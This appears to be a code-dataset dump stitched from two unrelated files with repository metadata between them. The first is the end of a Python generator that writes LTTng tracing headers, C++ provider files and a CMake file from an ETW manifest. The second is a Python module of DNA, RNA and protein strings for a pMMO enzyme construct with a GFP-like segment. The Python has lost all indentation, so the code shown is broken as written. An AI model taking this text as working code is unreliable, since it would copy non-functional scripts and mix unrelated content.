providerLines.append(generateMethodSignature(template))
providerLines.append(")")
providerLines.append("{")
providerLines.append(" if (!EventXplatEnabled" + eventName + "())")
providerLines.append(" return ERROR_SUCCESS;")
if template:
providerLines.append(generateMethodBody(template, providerName, eventName))
else:
providerLines.append(" do_tracepoint(" + providerName + ", " + eventName +");")
providerLines.append("")
providerLines.append(" return ERROR_SUCCESS;")
providerLines.append("}")
providerLines.append("")
return "\n".join(providerLines)
def generateEtwHeader(templates, events):
headerLines = []
headerLines.append("#include \"pal.h\"")
headerLines.append("")
for event in events:
eventName = event.getAttribute('symbol')
templateName = event.getAttribute('template')
template = None
if templateName:
template = templates[templateName]
callArgs = []
if template:
functionSignature = template.signature
for param in functionSignature.paramList:
if param in template.structCounts:
callArgs.append(param + "_ElementSize")
callArgs.append(param)
headerLines.append("extern \"C\" bool EventXplatEnabled" + eventName +"();")
headerLines.append("inline bool EventEnabled" + eventName +"() { return EventXplatEnabled" + eventName + "();}")
headerLines.append("")
headerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName +" (")
headerLines.append(generateMethodSignature(template))
headerLines.append(");")
headerLines.append("inline unsigned long EventWrite" + eventName + "(")
headerLines.append(generateMethodSignature(template))
headerLines.append(")")
headerLines.append("{")
headerLines.append(" return FireEtXplat" + eventName + "(" + ", ".join(callArgs) + ");")
headerLines.append("}")
headerLines.append("")
return "\n".join(headerLines)
def generateCmakeFile(providerName):
cmakeLines = []
cmakeLines.append("project(Chakra.LTTng)")
cmakeLines.append("")
cmakeLines.append("add_compile_options(-fPIC)")
cmakeLines.append("")
cmakeLines.append("add_library (Chakra.LTTng OBJECT")
cmakeLines.append(" eventprovider" + providerName + ".cpp")
cmakeLines.append(" tracepointprovider" + providerName + ".cpp")
cmakeLines.append(")")
return "\n".join(cmakeLines)
def generateLttngFiles(manifest, providerDirectory):
import os
tree = DOM.parse(manifest)
if not os.path.exists(providerDirectory):
os.makedirs(providerDirectory)
if not os.path.exists(providerDirectory + "/lttng"):
os.makedirs(providerDirectory + "/lttng")
for providerNode in tree.getElementsByTagName("provider"):
providerName = providerNode.getAttribute("name")
providerName = providerName.replace("Microsoft-", "")
providerNameFile = providerName.lower()
lttngEventHeaderShortName = "tp" + providerNameFile + ".h"
lttngEventHeaderPath = providerDirectory + "/lttng/" + lttngEventHeaderShortName
lttngEventProvider = providerDirectory + "/lttng/eventprovider" + providerNameFile + ".cpp"
lttngEventProviderTrace = providerDirectory + "/lttng/tracepointprovider" + providerNameFile + ".cpp"
lttngEtwHeaderFile = providerDirectory + "/lttng/" + providerNameFile + "Etw.h"
lttngCmakeFile = providerDirectory + "/lttng/CMakeLists.txt"
lttngHeader = open(lttngEventHeaderPath, "w")
lttngImplementation = open(lttngEventProvider, "w")
lttngTraceImplementation = open(lttngEventProviderTrace, "w")
lttngEtwHeader = open(lttngEtwHeaderFile, "w")
lttngCmake = open(lttngCmakeFile, "w")
# Create the lttng implementation
lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n")
lttngTraceImplementation.write("#include \"./"+lttngEventHeaderShortName+"\"\n")
lttngTraceImplementation.close()
# Create the lttng header
templateNodes = providerNode.getElementsByTagName('template')
eventNodes = providerNode.getElementsByTagName('event')
allTemplates = parseTemplateNodes(templateNodes)
lttngHeader.write(generateLttngHeader(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
lttngHeader.close();
lttngImplementation.write(generateLttngTracepointProvider(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
lttngImplementation.close();
lttngEtwHeader.write(generateEtwHeader(allTemplates, eventNodes))
lttngEtwHeader.close()
# Note: This in particular assumes that there is only one ETW provider
lttngCmake.write(generateCmakeFile(providerNameFile))
lttngCmake.close()
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description="Generates the Code required to instrument LTTtng logging mechanism")
required = parser.add_argument_group('required arguments')
required.add_argument('--man', type=str, required=True,
help='full path to manifest containig the description of events')
required.add_argument('--intermediate', type=str, required=True,
help='full path to eventprovider intermediate directory')
args, unknown = parser.parse_known_args(sys.argv[1:])
if unknown:
print('Unknown argument(s): ', ', '.join(unknown))
sys.exit(1)
generateLttngFiles(args.man, args.intermediate)
sys.exit(0)
| 38.989418 | 157 | 0.609716 | 1,818 | 0.061677 | 0 | 0 | 357 | 0.012112 | 0 | 0 | 8,853 | 0.300346 |
17d9825c1fef65245d3858f454c9d3950426c393 | 16,305 | py | Python | GSM_model/sequences.py | Schwebus/DTU_Biobuilders_2021 | 13fd78eb7516c401cc98f13ff878be3607521cef | [
"MIT"
] | null | null | null | GSM_model/sequences.py | Schwebus/DTU_Biobuilders_2021 | 13fd78eb7516c401cc98f13ff878be3607521cef | [
"MIT"
] | null | null | null | GSM_model/sequences.py | Schwebus/DTU_Biobuilders_2021 | 13fd78eb7516c401cc98f13ff878be3607521cef | [
"MIT"
] | 1 | 2021-07-02T09:16:06.000Z | 2021-07-02T09:16:06.000Z | pMMO_dna_seq = 'ATGAAAACTATTAAAGATAGAATTGCTAAATGGTCTGCTATTGGTTTGTTGTCTGCTGTTGCTGCTACTGCTTTTTATGCTCCATCTGCTTCTGCTCATGGTGAAAAATCTCAAGCTGCTTTTATGAGAATGAGGACTATTCATTGGTATGACTTATCTTGGTCTAAGGAAAAGGTTAAAATAAACGAAACTGTTGAGATTAAAGGTAAATTTCATGTTTTTGAAGGTTGGCCTGAAACTGTTGATGAACCTGATGTTGCTTTTTTGAATGTTGGTATGCCTGGTCCTGTTTTTATTAGAAAAGAATCTTATATTGGTGGTCAATTGGTTCCAAGATCTGTTAGATTGGAAATTGGTAAAACTTATGATTTTAGAGTTGTTTTGAAAGCTAGAAGACCTGGTGATTGGCATGTTCATACTATGATGAATGTTCAAGGTGGTGGTCCAATTATTGGTCCTGGTAAATGGATTACTGTTGAAGGTTCTATGTCTGAATTTAGAAATCCTGTTACTACTTTGACTGGTCAAACTGTTGATTTGGAAAATTATAATGAAGGTAATACTTATTTCTGGCACGCTTTTTGGTTCGCAATAGGCGTTGCCTGGATTGGATATTGGTCGAGGAGACCTATCTTCATACCAAGGTTATTGATGGTTGATGCTGGTAGAGCTGATGAATTGGTTTCTGCTACTGATAGAAAAGTTGCTATGGGTTTTTTGGCTGCTACTATTTTGATTGTTGTTATGGCTATGTCTTCTGCTAATTCTAAATATCCAATTACTATTCCATTGCAAGCTGGTACTATGAGAGGTATGAAACCATTGGAATTGCCTGCTCCAACTGTTTCTGTTAAAGTTGAAGATGCTACTTATAGAGTTCCTGGTAGAGCTATGAGAATGAAATTGACTATTACTAATCATGGTAATTCTCCAATTAGATTGGGTGAATTTTATACTGCTTCTGTTAGATTTTTGGATTCTGATGTTTATAAAGATACTACTGGTTATCCTGAAGATTTGTTGGCTGAAGATGGTTTGTCTGTTTCTGATAATTCTCCATTGGCTCCTGGTGAAACTAGAACTGTTGATGTTACTGCTTCTGATGCTGCTTGGGAAGTTTATAGATTGTCTGATATTATTTATGATCCTGATTCTAGATTTGCTGGTTTGTTGTTTTTTTTTGATGCTACTGGTAATAGACAAGTTGTTCAAATTGATGCTCCATTGATTCCATCTTTTATGTAAATGGTGAGCAAGGGCGAGGAGCTGTTCACCGGGGTGGTGCCCATCCTGGTCGAGCTGGACGGCGACGTAAACGGCCACAAGTTCAGCGTGTCCGGCGAGGGCGAGGGCGATGCCACCTACGGCAAGCTGACCCTGAAGCTGATCTGCACCACCGGCAAGCTGCCCGTGCCCTGGCCCACCCTCGTGACCACCCTGGGCTACGGCCTGCAGTGCTTCGCCCGCTACCCCGACCACATGAAGCAGCACGACTTCTTCAAGTCCGCCATGCCCGAAGGCTACGTCCAGGAGCGCACCATCTTCTTCAAGGACGACGGCAACTACAAGACCCGCGCCGAGGTGAAGTTCGAGGGCGACACCCTGGTGAACCGCATCGAGCTGAAGGGCATCGACTTCAAGGAGGACGGCAACATCCTGGGGCACAAGCTGGAGTACAACTACAACAGCCACAACGTCTATATCACCGCCGACAAGCAGAAGAACGGCATCAAGGCCAACTTCAAGATCCGCCACAACATCGAGGACGGCGGCGTGCAGCTCGCCGACCACTACCAGCAGAACACCCCCATCGGCGACGGCCCCGTGCTGCTGCCCGACAACCACTACCTGAGCTACCAGTCCAAGCTGAGCAAAGACCCCAACGAGAAGCGCGATCACATGGTCCTGCTGGAGTTCGTGACCGCCGCCGGGATCACTCTCGGCATGGACGAGCTGTACAAGTAATTACTTGTACAGCTCGTCCATGCCGAGAGTGATCCCGGCGGCGGTCACGAACTCCAGCAGGACCATGTGATCGCGCTTCTCGTTGGGGTCTTTGCTCAGCTTGGACTGGTAGCTCAGGTAGTGGTTGTCGGGCAGCAGCACGGGGCCGTCGCCGATGGGGGTGTTCTGCTGGTAGTGGTCGGCGAGCTGCACGCCGCCGTCCTCGATGTTGTGGCGGATCTTGAAGTTGGCCTTGATGCCGTTCTTCTGCTTGTCGGCGGTGATATAGACGTTGTGGCTGTTGTAGTTGTACTCCAGCTTGTGCCCCAGGATGTTGCCGTCCTCCTTGAAGTCGATGCCCTTCAGCTCGATGCGGTTCACCAGGGTGTCGCCCTCGAACTTCACCTCGGCGCGGGTCTTGTAGTTGCCGTCGTCCTTGAAGAAGATGGTGCGCTCCTGGACGTAGCCTTCGGGCATGGCGGACTTGAAGAAGTCGTGCTGCTTCATGTGGTCGGGGTAGCGGGCGAAGCACTGCAGGCCGTAGCCCAGGGTGGTCACGAGGGTGGGCCAGGGCACGGGCAGCTTGCCGGTGGTGCAGATCAGCTTCAGGGTCAGCTTGCCGTAGGTGGCATCGCCCTCGCCCTCGCCGGACACGCTGAACTTGTGGCCGTTTACGTCGCCGTCCAGCTCGACCAGGATGGGCACCACCCCGGTGAACAGCTCCTCGCCCTTGCTCACCATTTACATAAAAGATGGAATCAATGGAGCATCAATTTGAACAACTTGTCTATTACCAGTAGCATCAAAAAAAAACAACAAACCAGCAAATCTAGAATCAGGATCATAAATAATATCAGACAATCTATAAACTTCCCAAGCAGCATCAGAAGCAGTAACATCAACAGTTCTAGTTTCACCAGGAGCCAATGGAGAATTATCAGAAACAGACAAACCATCTTCAGCCAACAAATCTTCAGGATAACCAGTAGTATCTTTATAAACATCAGAATCCAAAAATCTAACAGAAGCAGTATAAAATTCACCCAATCTAATTGGAGAATTACCATGATTAGTAATAGTCAATTTCATTCTCATAGCTCTACCAGGAACTCTATAAGTAGCATCTTCAACTTTAACAGAAACAGTTGGAGCAGGCAATTCCAATGGTTTCATACCTCTCATAGTACCAGCTTGCAATGGAATAGTAATTGGATATTTAGAATTAGCAGAAGACATAGCCATAACAACAATCAAAATAGTAGCAGCCAAAAAACCCATAGCAACTTTTCTATCAGTAGCAGAAACCAATTCATCAGCTCTACCAGCATCAACCATCAATAACCTTGGTATGAAGATAGGTCTCCTCGACCAATATCCAATCCAGGCAACGCCTATTGCGAACCAAAAAGCGTGCCAGAAATAAGTATTACCTTCATTATAATTTTCCAAATCAACAGTTTGACCAGTCAAAGTAGTAACAGGATTTCTAAATTCAGACATAGAACCTTCAACAGTAATCCATTTACCAGGACCAATAATTGGACCACCACCTTGAACATTCATCATAGTATGAACATGCCAATCACCAGGTCTTCTAGCTTTCAAAACAACTCTAAAATCATAAGTTTTACCAATTTCCAATCTAACAGATCTTGGAACCAATTGACCACCAATATAAGATTCTTTTCTAATAAAAACAGGACCAGGCATACCAACATTCAAAAAAGCAACATCAGGTTCATCAACAGTTTCAGGCCAACCTTCAAAAACATGAAATTTACCTTTAATCTCAACAGTTTCGTTTATTTTAACCTTTTCCTTAGACCAAGATAAGTCATACCAATGAATAGTCCTCATTCTCATAAAAGCAGCTTGAGATTTTTCACCATGAGCAGAAGCAGATGGAGCATAAAAAGCAGTAGCAGCAACAGCAGACAACAAACCAATAGCAGACCATTTAGCAATTCTATCTTTAATAGTTTTCATTCATGAGATTATTGGAAACCACCAGAATCGAATATAAAAGGCGAACACCTTTCCCAATTTTGGTTTCTCCTGACCCAAAGACTTTTCATGAGATTATTGGAAACCACCAGAATCGAATATAAAAGGCGAACACCTTTCCCAATTTTGGTTTCTCCTGACCCAAAGACTTTTCATGAGATTATTGGAAACCACCAGAATCGAATATAAAAGGCGAACACCTTTCCCAATTTTGGTTTCTCCTGACCCAAAGACTTTAAAGTCTTTGGGTCAGGAGAAACCAAAATTGGGAAAGGTGTTCGCCTTTTATATTCGATTCTGGTGGTTTCCAATAATCTCATGAAAAGTCTTTGGGTCAGGAGAAACCAAAATTGGGAAAGGTGTTCGCCTTTTATATTCGATTCTGGTGGTTTCCAATAATCTCATGAAAAGTCTTTGGGTCAGGAGAAACCAAAATTGGGAAAGGTGTTCGCCTTTTATATTCGATTCTGGTGGTTTCCAATAATCTCATGAACTGACAATAAAAAGATTCTTGTTTTCAAGAACTTGTCATTTGTATAGTTTTTTTATATTGTAGTTGTTCTATTTTAATCAAATGTTAGCGTGATTTATATTTTTTTTCGCCTCGACATCATCTGCCCAGATGCGAAGTTAAGTGCGCAGAAAGTAATATCATGCGTCAATCGTATGTGAATGCTGGTCGCTATACTGACTGACAATAAAAAGATTCTTGTTTTCAAGAACTTGTCATTTGTATAGTTTTTTTATATTGTAGTTGTTCTATTTTAATCAAATGTTAGCGTGATTTATATTTTTTTTCGCCTCGACATCATCTGCCCAGATGCGAAGTTAAGTGCGCAGAAAGTAATATCATGCGTCAATCGTATGTGAATGCTGGTCGCTATACTGACTGACAATAAAAAGATTCTTGTTTTCAAGAACTTGTCATTTGTATAGTTTTTTTATATTGTAGTTGTTCTATTTTAATCAAATGTTAGCGTGATTTATATTTTTTTTCGCCTCGACATCATCTGCCCAGATGCGAAGTTAAGTGCGCAGAAAGTAATATCATGCGTCAATCGTATGTGAATGCTGGTCGCTATACTGCAGTATAGCGACCAGCATTCACATACGATTGACGCATGATATTACTTTCTGCGCACTTAACTTCGCATCTGGGCAGATGATGTCGAGGCGAAAAAAAATATAAATCACGCTAACATTTGATTAAAATAGAACAACTACAATATAAAAAAACTATACAAATGACAAGTTCTTGAAAACAAGAATCTTTTTATTGTCAGTCAGTATAGCGACCAGCATTCACATACGATTGACGCATGATATTACTTTCTGCGCACTTAACTTCGCATCTGGGCAGATGATGTCGAGGCGAAAAAAAATATAAATCACGCTAACATTTGATTAAAATAGAACAACTACAATATAAAAAAACTATACAAATGACAAGTTCTTGAAAACAAGAATCTTTTTATTGTCAGTCAGTATAGCGACCAGCATTCACATACGATTGACGCATGATATTACTTTCTGCGCACTTAACTTCGCATCTGGGCAGATGATGTCGAGGCGAAAAAAAATATAAATCACGCTAACATTTGATTAAAATAGAACAACTACAATATAAAAAAACTATACAAATGACAAGTTCTTGAAAACAAGAATCTTTTTATTGTCAGTATGAAACTACTCTTACCATTATTGACACTCGTTGCTGTTGCTAAGGCCATGTCTGCTGCTCAATCTGCTGTTAGATCTCATGCTGAAGCTGTTCAAGTTTCTAGAACTATTGATTGGATGGCTTTGTTTGTTGTTTTTTTTGTTATTGTTGGTTCTTATCATATTCATGCTATGTTGACTATGGGTGATTGGGATTTTTGGTCTGATTGGAAAGATAGAAGATTGTGGGTTACTGTTACTCCAATTGTTTTGGTTACTTTTCCTGCTGCTGTTCAATCTTATTTGTGGGAAAGATATAGATTGCCATGGGGTGCTACTGTTTGTGTTTTGGGTTTGTTGTTGGGTGAATGGATTAATAGATATTTTAATTTTTGGGGTTGGACTTATTTTCCAATTAATTTTGTTTTTCCTGCTTCTTTGGTTCCTGGTGCTATTATTTTGGATACTGTTTTGATGTTGTCTGGTTCTTATTTGTTTACTGCTATTGTTGGTGCTATGGGTTGGGGTTTGATTTTTTATCCTGGTAATTGGCCAATTATTGCTCCATTGCATGTTCCTGTTGAAAATAATGGTATGTTGATGTCTATTGCTGATATTCAAGGTTATAATTATGTTAGAACTGGTACTCCTGAATATATTAGAATGGTTGAAAAAGGTACTTTGAGAACTTTTGGTAAAGATGTTGCGCCCGTTTCAGCTTTTTTTTCTGCGTTCATGTCTATATTGATATATTTTATGTGGCATTTCATTGGTAGATGGTTTTCTAATGAAAGATTTTTGCAATCTACTTAATTAAGTAGATTGCAAAAATCTTTCATTAGAAAACCATCTACCAATGAAATGCCACATAAAATATATCAATATAGACATGAACGCAGAAAAAAAAGCTGAAACGGGCGCAACATCTTTACCAAAAGTTCTCAAAGTACCTTTTTCAACCATTCTAATATATTCAGGAGTACCAGTTCTAACATAATTATAACCTTGAATATCAGCAATAGACATCAACATACCATTATTTTCAACAGGAACATGCAATGGAGCAATAATTGGCCAATTACCAGGATAAAAAATCAAACCCCAACCCATAGCACCAACAATAGCAGTAAACAAATAAGAACCAGACAACATCAAAACAGTATCCAAAATAATAGCACCAGGAACCAAAGAAGCAGGAAAAACAAAATTAATTGGAAAATAAGTCCAACCCCAAAAATTAAAATATCTATTAATCCATTCACCCAACAACAAACCCAAAACACAAACAGTAGCACCCCATGGCAATCTATATCTTTCCCACAAATAAGATTGAACAGCAGCAGGAAAAGTAACCAAAACAATTGGAGTAACAGTAACCCACAATCTTCTATCTTTCCAATCAGACCAAAAATCCCAATCACCCATAGTCAACATAGCATGAATATGATAAGAACCAACAATAACAAAAAAAACAACAAACAAAGCCATCCAATCAATAGTTCTAGAAACTTGAACAGCTTCAGCATGAGATCTAACAGCAGATTGAGCAGCAGACATGGCCTTAGCAACAGCAACGAGTGTCAATAATGGTAAGAGTAGTTTCATATGAAACTACTCTTACCATTATTGACACTCGTTGCTGTTGCTAAGGCCATGGCTGCTACTACTATTGGTGGTGCTGCTGCTGCTGAAGCTCCATTGTTAGATAAGAAATGGTTGACATTTGCTTTGGCTATATACACTGTTTTTTATTTGTGGGTTAGATGGTATGAGGGGGTTTATGGCTGGTCTGCTGGTTTGGATTCTTTCGCTCCGGAGTTTGAAACTTATTGGATGAATTTCTTGTATACGGAGATTGTTTTGGAAATTGTTACTGCTTCTATTTTGTGGGGTTACTTATGGAAAACTAGAGATAGAAATTTGGCTGCTTTGACTCCAAGAGAAGAATTGAGAAGAAATTTTACTCATTTGGTATGGTTGGTTGCTTATGCTTGGGCTATTTACTGGGGTGCTTCTTATTTTACTGAACAAGATGGTACTTGGCACCAAACAATAGTTAGGGACACTGATTTTACACCTTCTCATATTATTGAATTCTATTTGTCTTACCCAATTTATATTATTACTGGGTTTGCTGCTTTTATTTATGCTAAAACTAGATTGCCATTTTTTGCTAAAGGTATTTCTTTGCCATATTTGGTTTTGGTTGTTGGTCCATTTATGATTTTGCCAAATGTTGGTTTGAATGAATGGGGTCATACTTTTTGGTTTATGGAAGAATTGTTTGTTGCTCCATTGCATTATGGTTTTGTTATTTTCGGTTGGTTGGCTTTGGCTGTTATGGGTACTTTGACTCAAACTTTTTATAGATTTGCTCAAGGTGGTTTGGGTCAATCTTTGTGTGAAGCTGTTGATGAAGGTTTGATTGCTAAATAATTATTTAGCAATCAAACCTTCATCAACAGCTTCACACAAAGATTGACCCAAACCACCTTGAGCAAATCTATAAAAAGTTTGAGTCAAAGTACCCATAACAGCCAAAGCCAACCAACCGAAAATAACAAAACCATAATGCAATGGAGCAACAAACAATTCTTCCATAAACCAAAAAGTATGACCCCATTCATTCAAACCAACATTTGGCAAAATCATAAATGGACCAACAACCAAAACCAAATATGGCAAAGAAATACCTTTAGCAAAAAATGGCAATCTAGTTTTAGCATAAATAAAAGCAGCAAACCCAGTAATAATATAAATTGGGTAAGACAAATAGAATTCAATAATATGAGAAGGTGTAAAATCAGTGTCCCTAACTATTGTTTGGTGCCAAGTACCATCTTGTTCAGTAAAATAAGAAGCACCCCAGTAAATAGCCCAAGCATAAGCAACCAACCATACCAAATGAGTAAAATTTCTTCTCAATTCTTCTCTTGGAGTCAAAGCAGCCAAATTTCTATCTCTAGTTTTCCATAAGTAACCCCACAAAATAGAAGCAGTAACAATTTCCAAAACAATCTCCGTATACAAGAAATTCATCCAATAAGTTTCAAACTCCGGAGCGAAAGAATCCAAACCAGCAGACCAGCCATAAACCCCCTCATACCATCTAACCCACAAATAAAAAACAGTGTATATAGCCAAAGCAAATGTCAACCATTTCTTATCTAACAATGGAGCTTCAGCAGCAGCAGCACCACCAATAGTAGTAGCAGCCATGGCCTTAGCAACAGCAACGAGTGTCAATAATGGTAAGAGTAGTTTCAT'
pMMO_rna_seq = 'UUAAGUAGAUUGCAAAAAUCUUUCAUUAGAAAACCAUCUACCAAUGAAAUGCCACAUAAAAUAUAUCAAUAUAGACAUGAACGCAGAAAAAAAAGCUGAAACGGGCGCAACAUCUUUACCAAAAGUUCUCAAAGUACCUUUUUCAACCAUUCUAAUAUAUUCAGGAGUACCAGUUCUAACAUAAUUAUAACCUUGAAUAUCAGCAAUAGACAUCAACAUACCAUUAUUUUCAACAGGAACAUGCAAUGGAGCAAUAAUUGGCCAAUUACCAGGAUAAAAAAUCAAACCCCAACCCAUAGCACCAACAAUAGCAGUAAACAAAUAAGAACCAGACAACAUCAAAACAGUAUCCAAAAUAAUAGCACCAGGAACCAAAGAAGCAGGAAAAACAAAAUUAAUUGGAAAAUAAGUCCAACCCCAAAAAUUAAAAUAUCUAUUAAUCCAUUCACCCAACAACAAACCCAAAACACAAACAGUAGCACCCCAUGGCAAUCUAUAUCUUUCCCACAAAUAAGAUUGAACAGCAGCAGGAAAAGUAACCAAAACAAUUGGAGUAACAGUAACCCACAAUCUUCUAUCUUUCCAAUCAGACCAAAAAUCCCAAUCACCCAUAGUCAACAUAGCAUGAAUAUGAUAAGAACCAACAAUAACAAAAAAAACAACAAACAAAGCCAUCCAAUCAAUAGUUCUAGAAACUUGAACAGCUUCAGCAUGAGAUCUAACAGCAGAUUGAGCAGCAGACAUGGCCUUAGCAACAGCAACGAGUGUCAAUAAUGGUAAGAGUAGUUUCAUUUACUUGUACAGCUCGUCCAUGCCGAGAGUGAUCCCGGCGGCGGUCACGAACUCCAGCAGGACCAUGUGAUCGCGCUUCUCGUUGGGGUCUUUGCUCAGCUUGGACUGGUAGCUCAGGUAGUGGUUGUCGGGCAGCAGCACGGGGCCGUCGCCGAUGGGGGUGUUCUGCUGGUAGUGGUCGGCGAGCUGCACGCCGCCGUCCUCGAUGUUGUGGCGGAUCUUGAAGUUGGCCUUGAUGCCGUUCUUCUGCUUGUCGGCGGUGAUAUAGACGUUGUGGCUGUUGUAGUUGUACUCCAGCUUGUGCCCCAGGAUGUUGCCGUCCUCCUUGAAGUCGAUGCCCUUCAGCUCGAUGCGGUUCACCAGGGUGUCGCCCUCGAACUUCACCUCGGCGCGGGUCUUGUAGUUGCCGUCGUCCUUGAAGAAGAUGGUGCGCUCCUGGACGUAGCCUUCGGGCAUGGCGGACUUGAAGAAGUCGUGCUGCUUCAUGUGGUCGGGGUAGCGGGCGAAGCACUGCAGGCCGUAGCCCAGGGUGGUCACGAGGGUGGGCCAGGGCACGGGCAGCUUGCCGGUGGUGCAGAUCAGCUUCAGGGUCAGCUUGCCGUAGGUGGCAUCGCCCUCGCCCUCGCCGGACACGCUGAACUUGUGGCCGUUUACGUCGCCGUCCAGCUCGACCAGGAUGGGCACCACCCCGGUGAACAGCUCCUCGCCCUUGCUCACCAUUUACAUAAAAGAUGGAAUCAAUGGAGCAUCAAUUUGAACAACUUGUCUAUUACCAGUAGCAUCAAAAAAAAACAACAAACCAGCAAAUCUAGAAUCAGGAUCAUAAAUAAUAUCAGACAAUCUAUAAACUUCCCAAGCAGCAUCAGAAGCAGUAACAUCAACAGUUCUAGUUUCACCAGGAGCCAAUGGAGAAUUAUCAGAAACAGACAAACCAUCUUCAGCCAACAAAUCUUCAGGAUAACCAGUAGUAUCUUUAUAAACAUCAGAAUCCAAAAAUCUAACAGAAGCAGUAUAAAAUUCACCCAAUCUAAUUGGAGAAUUACCAUGAUUAGUAAUAGUCAAUUUCAUUCUCAUAGCUCUACCAGGAACUCUAUAAGUAGCAUCUUCAACUUUAACAGAAACAGUUGGAGCAGGCAAUUCCAAUGGUUUCAUACCUCUCAUAGUACCAGCUUGCAAUGGAAUAGUAAUUGGAUAUUUAGAAUUAGCAGAAGACAUAGCCAUAACAACAAUCAAAAUAGUAGCAGCCAAAAAACCCAUAGCAACUUUUCUAUCAGUAGCAGAAACCAAUUCAUCAGCUCUACCAGCAUCAACCAUCAAUAACCUUGGUAUGAAGAUAGGUCUCCUCGACCAAUAUCCAAUCCAGGCAACGCCUAUUGCGAACCAAAAAGCGUGCCAGAAAUAAGUAUUACCUUCAUUAUAAUUUUCCAAAUCAACAGUUUGACCAGUCAAAGUAGUAACAGGAUUUCUAAAUUCAGACAUAGAACCUUCAACAGUAAUCCAUUUACCAGGACCAAUAAUUGGACCACCACCUUGAACAUUCAUCAUAGUAUGAACAUGCCAAUCACCAGGUCUUCUAGCUUUCAAAACAACUCUAAAAUCAUAAGUUUUACCAAUUUCCAAUCUAACAGAUCUUGGAACCAAUUGACCACCAAUAUAAGAUUCUUUUCUAAUAAAAACAGGACCAGGCAUACCAACAUUCAAAAAAGCAACAUCAGGUUCAUCAACAGUUUCAGGCCAACCUUCAAAAACAUGAAAUUUACCUUUAAUCUCAACAGUUUCGUUUAUUUUAACCUUUUCCUUAGACCAAGAUAAGUCAUACCAAUGAAUAGUCCUCAUUCUCAUAAAAGCAGCUUGAGAUUUUUCACCAUGAGCAGAAGCAGAUGGAGCAUAAAAAGCAGUAGCAGCAACAGCAGACAACAAACCAAUAGCAGACCAUUUAGCAAUUCUAUCUUUAAUAGUUUUCAUUUAUUUAGCAAUCAAACCUUCAUCAACAGCUUCACACAAAGAUUGACCCAAACCACCUUGAGCAAAUCUAUAAAAAGUUUGAGUCAAAGUACCCAUAACAGCCAAAGCCAACCAACCGAAAAUAACAAAACCAUAAUGCAAUGGAGCAACAAACAAUUCUUCCAUAAACCAAAAAGUAUGACCCCAUUCAUUCAAACCAACAUUUGGCAAAAUCAUAAAUGGACCAACAACCAAAACCAAAUAUGGCAAAGAAAUACCUUUAGCAAAAAAUGGCAAUCUAGUUUUAGCAUAAAUAAAAGCAGCAAACCCAGUAAUAAUAUAAAUUGGGUAAGACAAAUAGAAUUCAAUAAUAUGAGAAGGUGUAAAAUCAGUGUCCCUAACUAUUGUUUGGUGCCAAGUACCAUCUUGUUCAGUAAAAUAAGAAGCACCCCAGUAAAUAGCCCAAGCAUAAGCAACCAACCAUACCAAAUGAGUAAAAUUUCUUCUCAAUUCUUCUCUUGGAGUCAAAGCAGCCAAAUUUCUAUCUCUAGUUUUCCAUAAGUAACCCCACAAAAUAGAAGCAGUAACAAUUUCCAAAACAAUCUCCGUAUACAAGAAAUUCAUCCAAUAAGUUUCAAACUCCGGAGCGAAAGAAUCCAAACCAGCAGACCAGCCAUAAACCCCCUCAUACCAUCUAACCCACAAAUAAAAAACAGUGUAUAUAGCCAAAGCAAAUGUCAACCAUUUCUUAUCUAACAAUGGAGCUUCAGCAGCAGCAGCACCACCAAUAGUAGUAGCAGCCAUGGCCUUAGCAACAGCAACGAGUGUCAAUAAUGGUAAGAGUAGUUUCAU'
pMMO_aa_seq = 'MKLLLPLLTLVAVAKAMAATTIGGAAAAEAPLLDKKWLTFALAIYTVFYLWVRWYEGVYGWSAGLDSFAPEFETYWMNFLYTEIVLEIVTASILWGYLWKTRDRNLAALTPREELRRNFTHLVWLVAYAWAIYWGASYFTEQDGTWHQTIVRDTDFTPSHIIEFYLSYPIYIITGFAAFIYAKTRLPFFAKGISLPYLVLVVGPFMILPNVGLNEWGHTFWFMEELFVAPLHYGFVIFGWLALAVMGTLTQTFYRFAQGGLGQSLCEAVDEGLIAKMKTIKDRIAKWSAIGLLSAVAATAFYAPSASAHGEKSQAAFMRMRTIHWYDLSWSKEKVKINETVEIKGKFHVFEGWPETVDEPDVAFLNVGMPGPVFIRKESYIGGQLVPRSVRLEIGKTYDFRVVLKARRPGDWHVHTMMNVQGGGPIIGPGKWITVEGSMSEFRNPVTTLTGQTVDLENYNEGNTYFWHAFWFAIGVAWIGYWSRRPIFIPRLLMVDAGRADELVSATDRKVAMGFLAATILIVVMAMSSANSKYPITIPLQAGTMRGMKPLELPAPTVSVKVEDATYRVPGRAMRMKLTITNHGNSPIRLGEFYTASVRFLDSDVYKDTTGYPEDLLAEDGLSVSDNSPLAPGETRTVDVTASDAAWEVYRLSDIIYDPDSRFAGLLFFFDATGNRQVVQIDAPLIPSFMMVSKGEELFTGVVPILVELDGDVNGHKFSVSGEGEGDATYGKLTLKLICTTGKLPVPWPTLVTTLGYGLQCFARYPDHMKQHDFFKSAMPEGYVQERTIFFKDDGNYKTRAEVKFEGDTLVNRIELKGIDFKEDGNILGHKLEYNYNSHNVYITADKQKNGIKANFKIRHNIEDGGVQLADHYQQNTPIGDGPVLLPDNHYLSYQSKLSKDPNEKRDHMVLLEFVTAAGITLGMDELYKMKLLLPLLTLVAVAKAMSAAQSAVRSHAEAVQVSRTIDWMALFVVFFVIVGSYHIHAMLTMGDWDFWSDWKDRRLWVTVTPIVLVTFPAAVQSYLWERYRLPWGATVCVLGLLLGEWINRYFNFWGWTYFPINFVFPASLVPGAIILDTVLMLSGSYLFTAIVGAMGWGLIFYPGNWPIIAPLHVPVENNGMLMSIADIQGYNYVRTGTPEYIRMVEKGTLRTFGKDVAPVSAFFSAFMSILIYFMWHFIGRWFSNERFLQST'
